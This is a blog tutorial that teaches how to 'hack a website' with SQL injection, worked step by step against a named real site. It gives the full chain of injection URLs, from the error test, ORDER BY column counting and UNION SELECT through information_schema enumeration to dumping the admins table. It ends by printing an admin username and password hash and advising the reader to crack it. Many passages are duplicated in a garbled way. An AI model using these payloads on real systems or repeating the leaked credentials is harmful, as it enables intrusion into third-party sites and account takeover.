SQL Injection
This Article Is About how to Hack a website with SQL Injection. I and oceanofanythingg.blogspot.com Takes No responsibility for it’s misuse.ok.
we have a target http://www.allaboutcar.net/articles.php?topic=-3 let see if this is vnlnerable to sql Injection to check it put a ' in the end
http://www.allaboutcar.net/articles.php?topic=3'\
it gives a mysql Database error . that means its vnlnerable to sql injection .. ok lets get the cloumn numbers to do that u need this command "order by " .. put that in the end with count numbers
For Example:[-
http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--
do that untill u get a error
It gives a error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--
that mean it only has 5 columns .. because it didn,t give a error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
...
ok lets do the Union
to do this .. u need to use this command Union select
http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--
like that ..
there sould be number pop up somewhere
we got number 2 pop'd .. ok lets do the inject to 2
1st thing we need to check the db version if its 5 ..we continue .. if itsversion 4 .. u have to guess the table and columns to check the database version use this command "@@version" or "version()"its the version 5
5.0.67
ok now ..
let get the table names.. to do that u need to use this commands
group_concat(table_name)
information_schema.tables
we put this because we need the tables of the default detabase
where table_schema=database()--
we have the list of table here now
ok .. now we got this tables
http://www.allaboutcar.net/articles.php?topic=-3
For Example:[-
http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--
do that untill u get a error
It gives a error on http://www.allaboutcar.net/articles.php?topic=3 order by 6--
that mean it only has 5 columns .. because it didn,t give a error on
http://www.allaboutcar.net/articles.php?topic=3 order by 5--
...
ok lets do the Union
to do this .. u need to use this command Union select
http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--
like that ..
there sould be number pop up somewhere
we got number 2 pop'd .. ok lets do the inject to 2
1st thing we need to check the db version if its 5 ..we continue .. if itsversion 4 .. u have to guess the table and columns to check the database version use this command "@@version" or "version()"its the version 5
5.0.67
ok now ..
let get the table names.. to do that u need to use this commands
group_concat(table_name)
information_schema.tables
we put this because we need the tables of the default detabase
where table_schema=database()--
we have the list of table here now
ok .. now we got this tables
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--
Admins
,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,
Admins
,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,
forum_c,gbook,
infopages,
jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,
infopages,
jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,
users,ok we have the admin table here ..ok lets get the columns now .. to do that just chnage this
http://www.allaboutcar.net/articles.php?topic=-3
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--
to
http://www.allaboutcar.net/articles.php?topic=-3
to
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--
Now we have the columns
id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,
Now we have the columns
id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,
topic,author,id,ip,
date,id,title,
alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,
date,id,title,
alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,
what,date,wid,name,
mail,title,
text,ip,
id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,
now lets put this togeter !!
Table : admins
Columns : id,nick,pass,
In this we asked for the columns name's data from admin table
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
now here we have the id , nick and password hash .. you need to use a md5 cracker to crack this password .
So Friends that all for this tutorial
Username : MaTySeK,
Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253
mail,title,
text,ip,
id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,
now lets put this togeter !!
Table : admins
Columns : id,nick,pass,
In this we asked for the columns name's data from admin table
http://www.allaboutcar.net/articles.php?topic=-3
union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
now here we have the id , nick and password hash .. you need to use a md5 cracker to crack this password .
So Friends that all for this tutorial
Username : MaTySeK,
Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253
0 Comments